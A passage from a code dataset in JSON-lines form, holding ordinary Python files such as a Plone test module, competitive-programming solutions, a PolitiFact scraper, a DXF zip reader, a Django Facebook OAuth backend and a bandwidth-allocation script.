False","repo_name":"Hamed-Sadat1/data_structure_project","sub_path":"back.py","file_name":"back.py","file_ext":"py","file_size_in_byte":3464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44473260714","text":"# -*- coding: utf-8 -*-\n\"\"\"Test utilities.\"\"\"\nimport unittest2 as unittest\n\nfrom plone import api\n\nfrom collective.querynextprev.utils import (\n expire_session_data, first_common_item, get_next_items, get_previous_items, clean_query)\nfrom collective.querynextprev.testing import COLLECTIVE_QUERYNEXTPREV_INTEGRATION_TESTING # noqa #pylint: disable=C0301\n\n\nclass TestUtils(unittest.TestCase):\n\n \"\"\"Test NextPrevNavigationViewlet.\"\"\"\n\n layer = COLLECTIVE_QUERYNEXTPREV_INTEGRATION_TESTING\n\n def setUp(self):\n portal = api.portal.get()\n self.request = portal.REQUEST\n\n def tearDown(self):\n if hasattr(self.request, 'SESSION'):\n del self.request.SESSION\n\n def test_expire_session_data(self):\n \"\"\"Test expire_session_data function.\"\"\"\n request = self.request\n request.SESSION = {}\n expire_session_data(request)\n self.assertEqual(request.SESSION, {})\n\n request.SESSION = {\n 'foo': 'bar',\n 'querynextprev.foo': 'bar',\n 'querynextprev.bar': 'foo',\n }\n expire_session_data(request)\n self.assertEqual(request.SESSION, {'foo': 'bar'})\n\n def test_first_common_item(self):\n \"\"\"Test first common item util.\"\"\"\n l1 = [4, 5, 6, 7]\n l2 = [1, 2, 6, 7]\n\n self.assertEqual(\n first_common_item(l1, l2),\n 6)\n\n l1 = [1, 2, 4, 5, 6, 7]\n l2 = [1, 2, 6, 7]\n self.assertEqual(\n first_common_item(l1, l2),\n 1)\n\n l1 = [4, 5, 6, 7]\n l2 = [1, 2]\n self.assertIsNone(\n first_common_item(l1, l2))\n\n l1 = [1]\n l2 = [1]\n self.assertEqual(\n first_common_item(l1, l2),\n 1)\n\n def test_get_next_items(self):\n \"\"\"Test get_next_items function.\"\"\"\n lst = range(40)\n index = 19\n self.assertEqual(\n get_next_items(lst, index),\n range(20, 30)\n )\n\n index = 35\n self.assertEqual(\n get_next_items(lst, index),\n range(36, 40)\n )\n\n self.assertEqual(\n get_next_items(lst, index, include_index=True),\n range(35, 40)\n )\n\n def test_get_previous_items(self):\n \"\"\"Test get_previous_items function.\"\"\"\n lst = range(40)\n index = 21\n self.assertEqual(\n get_previous_items(lst, index),\n range(11, 21)\n )\n\n index = 5\n self.assertEqual(\n get_previous_items(lst, index),\n range(5)\n )\n\n self.assertEqual(\n get_previous_items(lst, index, include_index=True),\n range(6)\n )\n\n def test_clean_query(self):\n query = {'sort_order': 'descending', 'Language': ['fr', ''], 'sort_on': 'created',\n 'facet.field': ['', u'review_state', u'treating_groups', u'assigned_user', u'recipient_groups',\n u'mail_type'],\n 'b_size': 24, 'b_start': 0, 'portal_type': {'query': ['dmsincomingmail']}}\n self.assertDictEqual(clean_query(query), {'sort_order': 'descending', 'Language': ['fr', ''],\n 'sort_on': 'created', 'portal_type': {'query': ['dmsincomingmail']}})\n","repo_name":"collective/collective.querynextprev","sub_path":"src/collective/querynextprev/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":3301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15039498609","text":"N = int(input())\r\nitems = []\r\nfor _ in range(N):\r\n items.append(tuple(map(int, input().split())))\r\n\r\n\r\ndef check(x):\r\n f = True\r\n remain = [0] * N\r\n for i in range(N):\r\n h, s = items[i]\r\n remain[i] = (x - h) / s\r\n remain.sort()\r\n tmp = -1\r\n for r in remain:\r\n tmp += 1\r\n if tmp <= r:\r\n continue\r\n else:\r\n f = False\r\n break\r\n\r\n return f\r\n\r\n\r\nok = 10 ** 20\r\nng = 0\r\nt = 0\r\nwhile ok - ng > 1:\r\n mid = (ok + ng) // 2\r\n if check(mid):\r\n ok = mid\r\n else:\r\n ng = mid\r\n\r\nprint(ok)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc023/D/4068603.py","file_name":"4068603.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"23719523450","text":"def max_sum():\n\tnum_lst = []\n\ttotal_lst = []\n\ttry:\n\t\twith open('maxtriangle.txt', 'r') as fin:\n\t\t\tfor line in fin:\n\t\t\t\tnum_lst.append([int(x) for x in line.split()])\n\t\n\texcept FileNotFoundError: \n\t\tprint('File not found.')\n\t\n\tfor row in range(len(num_lst)-2, -1, -1):\n\t\tfor column in range(0, row+1):\n\t\t\tnum_lst[row][column] += max(num_lst[row+1][column], num_lst[row+1][column+1])\n\t\n\tmax_num = num_lst[row][column]\n\tcurrent_max = max_num \n\n\tfor row in range(len(num_lst)-1):\n\t\tfor column in range(0, row+1):\n\t\t\tif num_lst[row][column] == current_max:\n\t\t\t\ttotal_lst.append(current_max - max(num_lst[row+1][column], num_lst[row+1][column+1]))\n\t\t\t\tcurrent_max = max(num_lst[row+1][column], num_lst[row+1][column+1])\n\ttotal_lst.append(current_max)\n\t# print(total_lst)\n\t\n\tfinal_x = \"\"\n\tfor x in total_lst:\n\t\tif x != total_lst[len(total_lst)-1]:\n\t\t\tfinal_x += str(x) + \" + \"\n\t\telse:\n\t\t\tfinal_x += str(x) + \" = \" + str(max_num)\n\t\t\n\n\tprint(final_x)\n\n\n\n\n\n\t\n# \t\tfor numbers in range(1, len(line)):\n# \t\t\tnumbers = int(numbers)\n# \t\t\t#start from the second line to add to the first line\n# \t\t\t# all the left side -- remain one route all the way down\n# \t\t\tline[numbers][0]+= line[numbers-1][0]\n# \t\t\t# find the max sum of the middle \n# \t\t\twidth = len(lines[numbers]) \n# \t\t\tfor mid_num in range(1, width-1):\n# \t\t\t\tline[numbers][mid_num]+= max(line[numbers-1][mid_num], line[numbers-1][mid_num-1])\n# \t\t\t# right side -- remain one route all the way down\n# \t\t\tline[numbers][width-1]+= line[numbers-1][width-2]\n\n\n\n\n#############################################################################\ndef main():\n\n\tmax_sum()\n\n\n\n\n\n\nif __name__ == '__main__':\n\tmain()\n\n\n","repo_name":"nyhyang/Info206-Python","sub_path":"HW9_FunctionalProgramming/hw9.3.nyhyang.py","file_name":"hw9.3.nyhyang.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72393000552","text":"import sys\ninput = sys.stdin.readline\n\nfrom collections import deque\n\nn, m = map(int, input().split())\nadj = [[] for _ in range(n+1)]\n\nfor _ in range(m):\n a, b = map(int, input().split())\n adj[a].append(b)\n adj[b].append(a)\n\nans = 0\nvisit = [False]*(n+1)\nwhile True:\n q = deque()\n flag = False\n for i in range(1,n+1):\n if not visit[i]:\n visit[i] = True\n q.append(i)\n flag = True\n break\n\n while q:\n now = q.popleft()\n for ele in adj[now]:\n if not visit[ele]:\n visit[ele] = True\n q.append(ele)\n\n if not flag:\n break\n else:\n ans += 1\nprint(ans)","repo_name":"112224/algorithm","sub_path":"python3/11724 연결 요소의 갯수.py","file_name":"11724 연결 요소의 갯수.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28915126635","text":"from itertools import permutations\nn = int(input())\na = [[0]*(2*n-1)]*(2*n-1)\n\nfor i in range(2*n-1):\n a[i] = list(map(int, input().split()))\nans = 0\nfor comb1 in permutations(range(2*n),n):\n comb2 = [i for i in range(2*n) if i not in comb1]\n x0 = 0\n for i in range(n):\n \n x = a[min(comb1[i], comb2[i])][max(comb1[i], comb2[i]) -1 - min(comb1[i], comb2[i])]\n x0 = x0^x\n\n ans = max(ans, x0)\nprint(ans)\n\n","repo_name":"monarsan/atcoder","sub_path":"contest/202201/abc0123/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16680121717","text":"import artemis\nimport os\n\n\n# Set inputs.\nthis_file_dir = os.path.dirname(__file__)\nscenario_file = os.path.join(this_file_dir, 'default_config.yml') # Config file that needs to be run.\noutput_subfolder = os.path.join(this_file_dir, 'example_output/') # Determines output directory.\n\n# Run the simulation.\nscenario_data = artemis.io.read_data_from_yml(scenario_file) # Read scenario_file.\nartemis.run_artemis(scenario_data, output_subfolder, save_config=False)\n","repo_name":"gijntema/artemis","sub_path":"scripts/default_scenario.py","file_name":"default_scenario.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13741092094","text":"import json\n\nfrom modules.requests.methods import Methods\nfrom modules.requests.request import Request\n\n\nclass RequestParser:\n \"\"\"\n Parse the request in order to get:\n - method\n - url\n - parameters\n - post data\n \"\"\"\n\n def _parse_parameters(self, path):\n url = path\n parameters = {}\n\n # Check if there are get parameters\n if '?' in path:\n url, params = path.split('?')\n\n # Check if there are multiple parameters\n if '&' in params:\n params = params.split('&')\n else:\n params = [params]\n\n # Build the parameters's dictionary\n for param in params:\n name, value = None, None\n if '=' in param:\n name, value = param.split('=')\n else:\n name = param\n parameters.update({name: value})\n\n return url, parameters\n\n def _parse_post_data(self, connection):\n \"\"\"\n Unpack the post data (if present)\n \"\"\"\n\n data = None\n\n # Check if it's a POST request\n if connection.command == Methods.POST:\n\n # Try to load the json data from the request.\n # Only data form accepted is JSON\n try:\n content_len = int(connection.headers['content-length'])\n data = json.loads(connection.rfile.read(content_len).decode())\n except:\n pass\n return data\n\n def parse(self, connection):\n \"\"\"\n Unpack the request\n \"\"\"\n method = connection.command\n url, parameters = self._parse_parameters(connection.path)\n data = self._parse_post_data(connection)\n\n return Request(connection, method, url, parameters, data)\n","repo_name":"alemazzo/WebServerReti","sub_path":"modules/requests/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"38899465049","text":"# Source : https://leetcode.com/problems/group-anagrams/description/\n\n# Algo/DS : String\n\n# Complexity : O(n (Klogk)) where k is length of longest string and n\n# is number of strings\n\nclass Solution(object):\n def groupAnagrams(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: List[List[str]]\n \"\"\"\n d = {} \n for word in strs:\n key = \"\".join(sorted(word))\n d[key] = d.get(key,[]) + [word] \n return d.values()\n \n ","repo_name":"neelamy/Leetcode","sub_path":"String/49_GroupAnagrams.py","file_name":"49_GroupAnagrams.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8251173413","text":"# -*- coding: utf-8 -*-\nimport re\nfrom typing import List, Set\n\nfrom bs4 import BeautifulSoup\nfrom dateparser.search import search_dates\nfrom tqdm import tqdm\n\nfrom claim_extractor import Claim, Configuration\nfrom claim_extractor.extractors import FactCheckingSiteExtractor, caching\n\n\nclass PolitifactFactCheckingSiteExtractor(FactCheckingSiteExtractor):\n\n def __init__(self, configuration: Configuration):\n super().__init__(configuration)\n\n def retrieve_listing_page_urls(self) -> List[str]:\n listings_url = \"https://www.politifact.com/truth-o-meter/rulings/\"\n page = caching.get(listings_url, headers=self.headers, timeout=5)\n parsed = BeautifulSoup(page, \"lxml\")\n main_tag = parsed.find(\"main\", {\"class\": \"main\"}) # type: BeautifulSoup\n links = main_tag.find_all(\"a\", href=True)\n return [\"http://www.politifact.com\" + link['href'] for link in links]\n\n def find_page_count(self, parsed_listing_page: BeautifulSoup) -> int:\n page_text = parsed_listing_page.find(\"span\", {\"class\": \"step-links__current\"}).text.strip()\n page_re = re.compile(\"Page [0-9]+ of ([0-9]+)\")\n max_page = int(page_re.match(page_text).group(1))\n return max_page\n\n def retrieve_urls(self, parsed_listing_page: BeautifulSoup, listing_page_url: str, number_of_pages: int) \\\n -> List[str]:\n urls = self.extract_urls(parsed_listing_page)\n for page_number in tqdm(range(2, number_of_pages)):\n url = listing_page_url + \"?page=\" + str(page_number)\n page = caching.get(url, headers=self.headers, timeout=5)\n current_parsed_listing_page = BeautifulSoup(page, \"lxml\")\n urls += self.extract_urls(current_parsed_listing_page)\n return urls\n\n def extract_urls(self, parsed_listing_page: BeautifulSoup):\n urls = list()\n links = parsed_listing_page.findAll(\"p\", {\"class\": \"statement__text\"})\n for anchor in links:\n anchor = anchor.find('a', {\"class\": \"link\"}, href=True)\n url = \"http://www.politifact.com\" + str(anchor['href'])\n max_claims = self.configuration.maxClaims\n if 0 < max_claims <= len(urls):\n break\n if url not in self.configuration.avoid_urls:\n urls.append(url)\n return urls\n\n def extract_claim_and_review(self, parsed_claim_review_page: BeautifulSoup, url: str) -> List[Claim]:\n claim = Claim()\n claim.set_url(url)\n claim.set_source(\"politifact\")\n\n # title\n title = parsed_claim_review_page.find(\"h1\", {\"class\": \"article__title\"})\n claim.set_title(title.text)\n\n # date\n date = parsed_claim_review_page.find('div', {\"class\": \"widget__content\"}).find(\"p\")\n if date:\n date_str = search_dates(date.text)[0][1].strftime(\"%Y-%m-%d\")\n claim.set_date(date_str)\n\n # rating\n rating_div = parsed_claim_review_page.find(\"div\", {\"itemprop\": \"reviewRating\"})\n if rating_div:\n rating_value = rating_div.find(\"div\", {\"itemprop\": \"ratingValue\"})\n if rating_value:\n claim.rating_value = rating_value.text\n worst_rating = rating_div.find(\"div\", {\"itemprop\": \"worstRating\"})\n if worst_rating:\n claim.worst_rating = worst_rating.text\n\n best_rating = rating_div.find(\"div\", {\"itemprop\": \"bestRating\"})\n if best_rating:\n claim.best_rating = best_rating.text\n\n alternate_name = rating_div.find(\"div\", {\"itemprop\": \"alternateName\"})\n if alternate_name:\n claim.alternate_name = alternate_name.text\n else:\n statement_detail = parsed_claim_review_page.find(\"img\", {\"class\", \"statement-detail\"})\n if statement_detail:\n claim.alternate_name = statement_detail['alt']\n\n # body\n body = parsed_claim_review_page.find(\"div\", {\"class\": \"article__text\"})\n claim.set_body(body.get_text())\n\n # author\n statement_meta = parsed_claim_review_page.find(\"p\", {\"class\": \"statement__meta\"})\n if statement_meta:\n author = statement_meta.find(\"a\").text\n claim.set_author(author)\n else:\n author = parsed_claim_review_page.find(\"div\", {\"itemprop\": \"itemReviewed\"})\n if author:\n author = author.find(\"div\", {\"itemprop\": \"author\"})\n author_text = author.text\n claim.set_author(author_text)\n\n # same as\n rating_div = parsed_claim_review_page.find(\"div\", {\"itemprop\": \"itemReviewed\"})\n if rating_div and rating_div.find(\"div\", {\"itemprop\": \"sameAs\"}):\n claim.setSameAs(rating_div.find(\"div\", {\"itemprop\": \"sameAs\"}).get_text())\n\n # date published\n if statement_meta:\n meta_text = statement_meta.text\n if \"on\" in meta_text:\n meta_text = meta_text.split(\" on \")[1]\n if \"in\" in meta_text:\n meta_text = meta_text.split(\" in \")[0]\n if meta_text:\n date = search_dates(meta_text)\n if date:\n date = date[0][1].strftime(\"%Y-%m-%d\")\n claim.setDatePublished(date)\n else:\n rating_div = parsed_claim_review_page.find(\"div\", {\"itemprop\": \"itemReviewed\"})\n if rating_div and rating_div.find(\"div\", {\"itemprop\": \"datePublished\"}):\n claim.setDatePublished(rating_div.find(\"div\", {\"itemprop\": \"datePublished\"}).get_text())\n\n # related links\n div_tag = parsed_claim_review_page.find(\"div\", {\"class\": \"article__text\"})\n related_links = []\n for link in div_tag.findAll('a', href=True):\n related_links.append(link['href'])\n claim.set_refered_links(related_links)\n\n claim.set_claim(parsed_claim_review_page.find(\"div\", {\"class\": \"statement__text\"}).text.strip())\n\n tags = []\n about_widget = parsed_claim_review_page.find(\"div\", {\"class\", \"widget_about-article\"})\n if about_widget:\n about_widget_contents = about_widget.find(\"div\", {\"class\", \"widget__content\"})\n for p in about_widget_contents.findAll(\"p\"):\n text = p.text\n if \"Subjects:\" in text:\n for subject in p.findAll(\"a\"):\n tags.append(subject.text)\n\n claim.set_tags(\",\".join(tags))\n\n return [claim]\n","repo_name":"eleutheromastrophimatique/ClaimsExtractor-","sub_path":"claim_extractor/extractors/politifact.py","file_name":"politifact.py","file_ext":"py","file_size_in_byte":6489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13542903749","text":"from typing import BinaryIO, cast, TextIO, List\nimport zipfile\nfrom contextlib import contextmanager\n\nfrom ezdxf.lldxf.validator import is_dxf_stream, dxf_info\n\nWIN_NEW_LINE = b'\\r\\n'\nNEW_LINE = b'\\n'\n\n\nclass ZipReader:\n def __init__(self, zip_archive_name: str):\n if not zipfile.is_zipfile(zip_archive_name):\n raise IOError(\"'{}' is not a zip archive.\".format(zip_archive_name))\n self.zip_archive_name = zip_archive_name\n self.zip_archive = None # type: zipfile.ZipFile\n self.dxf_file_name = None # type: str\n self.dxf_file = None # type: BinaryIO\n self.encoding = 'cp1252'\n self.dxfversion = 'AC1009'\n\n def open(self, dxf_file_name: str = None) -> None:\n def open_dxf_file() -> BinaryIO:\n return self.zip_archive.open(self.dxf_file_name) # open always in binary mode\n\n self.zip_archive = zipfile.ZipFile(self.zip_archive_name)\n self.dxf_file_name = dxf_file_name if dxf_file_name is not None else self.get_first_dxf_file_name()\n self.dxf_file = open_dxf_file()\n\n # reading with standard encoding 'cp1252' - readline() fails if leading comments contain none ascii characters\n if not is_dxf_stream(cast(TextIO, self)):\n raise IOError(\"'{}' is not a DXF file.\".format(self.dxf_file_name))\n self.dxf_file = open_dxf_file() # restart\n self.get_dxf_info()\n self.dxf_file = open_dxf_file() # restart\n\n def get_first_dxf_file_name(self) -> str:\n dxf_file_names = self.get_dxf_file_names()\n if len(dxf_file_names) > 0:\n return dxf_file_names[0]\n else:\n raise IOError(\"'{}' has no DXF files.\")\n\n def get_dxf_file_names(self) -> List[str]:\n return [name for name in self.zip_archive.namelist() if name.lower().endswith('.dxf')]\n\n def get_dxf_info(self) -> None:\n info = dxf_info(cast(TextIO, self))\n # since DXF R2007 (AC1021) file encoding is always 'utf-8'\n self.encoding = info.encoding if info.version < 'AC1021' else 'utf-8'\n self.dxfversion = info.version\n\n # required TextIO interface\n def readline(self) -> str:\n next_line = self.dxf_file.readline().replace(WIN_NEW_LINE, NEW_LINE)\n return str(next_line, self.encoding)\n\n def close(self) -> None:\n self.zip_archive.close()\n\n\n@contextmanager\ndef ctxZipReader(zipfilename: str, filename: str = None) -> ZipReader:\n zip_reader = ZipReader(zipfilename)\n zip_reader.open(filename)\n yield zip_reader\n zip_reader.close()\n","repo_name":"tapnair/DXFImporter","sub_path":"DXFImporter/lib/ezdxf/tools/zipmanager.py","file_name":"zipmanager.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"41955297156","text":"\"\"\"\nFacebook OAuth support.\n\nThis contribution adds support for Facebook OAuth service. The settings\nFACEBOOK_APP_ID and FACEBOOK_API_SECRET must be defined with the values\ngiven by Facebook application registration process.\n\nExtended permissions are supported by defining FACEBOOK_EXTENDED_PERMISSIONS\nsetting, it must be a list of values to request.\n\nBy default account id and token expiration time are stored in extra_data\nfield, check OAuthBackend class for details on how to extend it.\n\"\"\"\nimport logging\nlogger = logging.getLogger(__name__)\n\n\nimport cgi\nfrom urllib import urlencode\nfrom urllib2 import urlopen\n\nfrom django.conf import settings\nfrom django.utils import simplejson\nfrom django.contrib.auth import authenticate\n\nfrom social_auth.backends import BaseOAuth2, OAuthBackend, USERNAME\nfrom social_auth.utils import sanitize_log_data\n\n\n# Facebook configuration\nEXPIRES_NAME = getattr(settings, 'SOCIAL_AUTH_EXPIRATION', 'expires')\nFACEBOOK_ME = 'https://graph.facebook.com/me?'\n\n\nclass FacebookBackend(OAuthBackend):\n \"\"\"Facebook OAuth2 authentication backend\"\"\"\n name = 'facebook'\n # Default extra data to store\n EXTRA_DATA = [('id', 'id'), ('expires', EXPIRES_NAME)]\n\n def get_user_details(self, response):\n \"\"\"Return user details from Facebook account\"\"\"\n return {USERNAME: response.get('username'),\n 'email': response.get('email', ''),\n 'fullname': response['name'],\n 'first_name': response.get('first_name', ''),\n 'last_name': response.get('last_name', '')}\n\n\nclass FacebookAuth(BaseOAuth2):\n \"\"\"Facebook OAuth2 support\"\"\"\n AUTH_BACKEND = FacebookBackend\n RESPONSE_TYPE = None\n SCOPE_SEPARATOR = ','\n AUTHORIZATION_URL = 'https://www.facebook.com/dialog/oauth'\n SETTINGS_KEY_NAME = 'FACEBOOK_APP_ID'\n SETTINGS_SECRET_NAME = 'FACEBOOK_API_SECRET'\n\n def get_scope(self):\n return getattr(settings, 'FACEBOOK_EXTENDED_PERMISSIONS', [])\n\n def user_data(self, access_token):\n \"\"\"Loads user data from service\"\"\"\n data = None\n url = FACEBOOK_ME + urlencode({'access_token': access_token})\n\n try:\n data = simplejson.load(urlopen(url))\n logger.debug('Found user data for token %s',\n sanitize_log_data(access_token),\n extra=dict(data=data))\n except ValueError:\n extra = {'access_token': sanitize_log_data(access_token)}\n logger.error('Could not load user data from Facebook.',\n exc_info=True, extra=extra)\n return data\n\n def auth_complete(self, *args, **kwargs):\n \"\"\"Completes loging process, must return user instance\"\"\"\n if 'code' in self.data:\n url = 'https://graph.facebook.com/oauth/access_token?' + \\\n urlencode({'client_id': settings.FACEBOOK_APP_ID,\n 'redirect_uri': self.redirect_uri,\n 'client_secret': settings.FACEBOOK_API_SECRET,\n 'code': self.data['code']})\n response = cgi.parse_qs(urlopen(url).read())\n access_token = response['access_token'][0]\n data = self.user_data(access_token)\n if data is not None:\n if 'error' in data:\n error = self.data.get('error') or 'unknown error'\n raise ValueError('Authentication error: %s' % error)\n data['access_token'] = access_token\n # expires will not be part of response if offline access\n # premission was requested\n if 'expires' in response:\n data['expires'] = response['expires'][0]\n kwargs.update({'response': data, self.AUTH_BACKEND.name: True})\n return authenticate(*args, **kwargs)\n else:\n error = self.data.get('error') or 'unknown error'\n raise ValueError('Authentication error: %s' % error)\n\n @classmethod\n def enabled(cls):\n \"\"\"Return backend enabled status by checking basic settings\"\"\"\n return all(hasattr(settings, name) for name in ('FACEBOOK_APP_ID',\n 'FACEBOOK_API_SECRET'))\n\n\n# Backend definition\nBACKENDS = {\n 'facebook': FacebookAuth,\n}\n","repo_name":"sameenjalal/mavenize","sub_path":"mavenize-boilerplate/mavenize-alpha/django/lib/python2.6/site-packages/social_auth/backends/facebook.py","file_name":"facebook.py","file_ext":"py","file_size_in_byte":4333,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"37746068454","text":"import csv\nimport math\nimport sys\nimport os\nimport os.path as osp\n\n# NOTE 提交前记得修改路径\ninput_path = \"data/\"\noutput_path = \"output/solution.txt\"\n\ndef getSiteBandwidth():\n site_bandwidth = {}\n with open(osp.join(input_path, \"site_bandwidth.csv\")) as f:\n f_csv = csv.reader(f)\n headers = next(f_csv)\n for row in f_csv:\n site_bandwidth[row[0]] = int(row[1])\n N = len(site_bandwidth) # N site\n return site_bandwidth, N\n\ndef getQoSConstraint():\n with open(osp.join(input_path, \"config.ini\"), mode='r') as f:\n qos_constraint = int(f.readlines()[1].split(\"=\")[-1])\n return qos_constraint\n\ndef getQoS():\n qos = {}\n with open(osp.join(input_path, \"qos.csv\")) as f:\n f_csv = csv.reader(f)\n headers = next(f_csv)\n M = len(headers) - 1\n for row in f_csv:\n for i in range(M):\n qos[(row[0], headers[i+1])] = int(row[i+1])\n return qos\n\ndef getDemand():\n demand = {}\n with open(osp.join(input_path, \"demand.csv\")) as f:\n f_csv = csv.reader(f)\n headers = next(f_csv)\n M = len(headers) - 1 # M client\n for row in f_csv:\n for i in range(M):\n if headers[i+1] not in demand.keys():\n demand[headers[i+1]] = [int(row[i+1])]\n else:\n demand[headers[i+1]].append(int(row[i+1]))\n T = len(demand[headers[1]]) # T\n return demand, T\n\n\ndemand, timestamps = getDemand()\nqos_constraint = getQoSConstraint()\nqos = getQoS()\nsite_bandwidth, site_number = getSiteBandwidth()\n\n \nif __name__=='__main__':\n solution = open(output_path,mode='w')\n\n # print('demand:', demand)\n # print('timestamps:', timestamps)\n # print('qos_constraint:', qos_constraint)\n # print('qos:', qos)\n # print('site_bandwidth:', site_bandwidth)\n # print('site_number:', site_number)\n\n # 记录每一个客户可用的边缘节点\n site4client = {}\n for m in demand.keys():\n for n in site_bandwidth.keys():\n # print(n, m)\n # print(qos[(n, m)])\n if qos[(n, m)] < qos_constraint:\n if m not in site4client.keys():\n site4client[m] = [n]\n else:\n site4client[m].append(n)\n # print('site4client:', site4client)\n # print(site4client['A'])\n\n # 每一个边缘节点可以服务的客户\n client4site = {}\n for n in site_bandwidth.keys():\n for m in demand.keys():\n if qos[(n, m)] < qos_constraint:\n if n not in client4site.keys():\n client4site[n] = [m]\n else:\n client4site[n].append(m)\n\n # print(client4site)\n \n line_count = 0\n for t in range(timestamps):\n client_info = {}\n for client in list(demand.keys()):\n # print(demand[client][t])\n client_info[client] = [demand[client][t]]\n client_info[client].append(demand[client][t])\n client_info[client].append(len(site4client[client]))\n \n # print(client_info)\n\n # for client in list(client_info.keys()):\n # print(client)\n \n # 根据可用的边缘节点数量从小到大排序\n client_info_order = sorted(client_info.items(), key=lambda x:x[1][2], reverse=False)\n # print(client_info_order)\n\n # for client in [x[0] for x in client_info_order]:\n # print(client)\n\n site_info = {}\n for site in list(site_bandwidth.keys()):\n # print(site_bandwidth[site])\n site_info[site] = [site_bandwidth[site]]\n site_info[site].append(site_bandwidth[site])\n # print(site_info['DZ'])\n\n for client in [x[0] for x in client_info_order]:\n line_count += 1\n solution.write(client + \":\")\n if client_info[client][0] == 0:\n solution.write('\\n')\n continue\n while(client_info[client][1] > 0):\n # print(client)\n # print(site4client[client])\n actual_site = list(site4client[client])\n average_bandwidth = math.ceil(client_info[client][1] /len(actual_site))\n # print(average_bandwidth)\n for site in list(actual_site):\n # print(site_info[site][1])\n if site_info[site][1] >= average_bandwidth:\n client_info[client][1] -= average_bandwidth\n site_info[site][1] -= average_bandwidth\n if client_info[client][1] <= 0:\n site_info[site][1] += (0 - client_info[client][1])\n break\n else:\n actual_site.remove(site)\n \n\n # print(actual_site)\n if len(actual_site) == 0:\n print('No feasible solution')\n solution.close()\n os.remove(output_path)\n sys.exit(1)\n\n count = 0\n writed_site_count = 0\n for site in list(site4client[client]):\n count += 1 # 当前使用的边缘节点数量\n assigned_bandwidth = site_info[site][0] - site_info[site][1]\n site_info[site][0] = site_info[site][1]\n if assigned_bandwidth != 0:\n if assigned_bandwidth < 0:\n print(\" computation error \")\n # 没到最后一个边缘节点\n if count < len(list(site4client[client])):\n # if count == 1:\n # solution.write(\"<\" + site + \",\" + str(assigned_bandwidth) + \">\")\n # writed_site_count += 1\n # else:\n if writed_site_count == 0:\n solution.write(\"<\" + site + \",\" + str(assigned_bandwidth) + \">\")\n writed_site_count += 1\n \n elif writed_site_count > 0:\n solution.write(\",<\" + site + \",\" + str(assigned_bandwidth) + \">\")\n writed_site_count += 1\n \n else:\n if line_count != timestamps*len(demand):\n solution.write(\",<\" + site + \",\" + str(assigned_bandwidth) + \">\\n\")\n \n elif line_count == timestamps*len(demand):\n solution.write(\",<\" + site + \",\" + str(assigned_bandwidth) + \">\")\n \n else:\n if count == len(list(site4client[client])) and line_count != timestamps*len(demand):\n solution.write(\"\\n\")\n \n #check\n # print(t)\n total_demand = 0\n for client in list(client_info.keys()):\n # print(client)\n # print(client_info[client][0], client_info[client][1])\n total_demand += client_info[client][0]\n if client_info[client][1] > 0:\n print(\"Insufficient allocation\")\n solution.close()\n os.remove(output_path)\n sys.exit()\n \n total_assigned = 0\n for site in list(site_info.keys()):\n # print(site)\n # print(site_info[site][0], site_info[site][1])\n total_assigned += (site_bandwidth[site] - site_info[site][1])\n if site_info[site][1] < 0:\n print(\"Upper limit exceeded\")\n solution.close()\n os.remove(output_path)\n sys.exit()\n\n print(total_demand)\n print(total_assigned)\n\n if total_demand != total_assigned:\n print(\"allocation mismatching\")\n solution.close()\n os.remove(output_path)\n sys.exit()\n \n # breakpoint()\n\n solution.close()\n # os.remove(output_path)\n\n","repo_name":"Rodger-Huang/2022HUAWEIChallenge","sub_path":"preliminary_contest/SDK_python/CodeCraft-2022/src/CodeCraft_2022_1373918.py","file_name":"CodeCraft_2022_1373918.py","file_ext":"py","file_size_in_byte":8064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33211355224","text":"from collections import deque\nimport torch\n\nfrom config import Config\n\nclass ShortTermMemory():\n def __init__(self, glow):\n \"\"\"\n Short term memory contains memorized experience as observation, action and target h-value. All as torch.Tensors.\n It also contains the history of observations, actions, h-values and rewards.\n Memories are added from the history through backpropagation of the rewad via a glow mechanism. \n Additionally, we can add fake experience used for training decoders on the policy of an agent. \n That is, experience which corresponds to h-values that should be 0.\n\n Args:\n glow (float): Glow value which determines how much a reward is backpropagated.\n \"\"\"\n self.glow = glow\n #:class:`collections.deque` of :obj:`tuple`: Short term memory. Short term experiences are stored here.\n self.memory = deque()\n #:class:`collections.deque` of :obj:`tuple`: Short term memory. Fake short term experiences are stored here.\n self.memory_fake = deque()\n #:class:`list` of :obj:`tuple`: History of observations, actions, h-values and rewards.\n self.history = list()\n #:class:`list` of :obj:`bool`: List of flags associated with experiences to be remembered.\n self.flags = list()\n\n def create_experience(self):\n \"\"\"\n Creates experience from history by backpropagating rewards and adds experience to the memory.\n Does not reset history or memory before or after.\n \"\"\"\n current_reward = 0\n for i, hist in enumerate(reversed(self.history)):\n observation, action, hval, reward = hist\n is_saved 